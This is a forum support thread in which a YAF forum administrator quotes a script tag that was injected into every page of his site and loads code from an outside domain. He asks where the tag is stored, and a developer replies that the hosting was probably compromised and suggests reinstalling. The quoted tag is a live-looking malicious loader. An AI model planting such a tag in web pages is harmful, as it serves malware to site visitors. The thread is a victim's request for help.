YAFLogo

Dagonus
  • Dagonus
  • 59.6% (Neutral)
  • YAF Forumling Topic Starter
15 years ago
I manage the forums from some friends of mine an one of them recently started getting errors related to a Trojan whenever he is on the forums.

I checked in the html source on the page and I can see where he's getting the script from


<script src=http://ozguvenplastik.com/images/image.php ></script>

That is appearing right after the head and right before the body on everypage. I'm not terribly SQL savvy and I'm figuring it's probably in the database somewhere(which is why I installed YAF in the first place; Seemed nice and easy to handle without me having to get too far into the guts). Where would in the database would that line be? Like I said, it's appearing right after the head, but before the body tags.

Version 1.9.1.7

I had noticed a few people having problems updating so I've never bothered to update (If it ain't broke don't fix it type of thing), but if an update will cure the problem, that's fine by me, I'd just hate to have the problem happen again and still not know where to fix it from.

Sponsor
Jaben
  • Jaben
  • 100% (Exalted)
  • YAF Developer
15 years ago
I don't believe it's YAF specific... I think someone actually gained access to your hosting and put this bit of malicious code into your site. I suggest downloading v1.9.1.8 (from SourceForge) and installing it over your current version... so the code is original again.

good luck.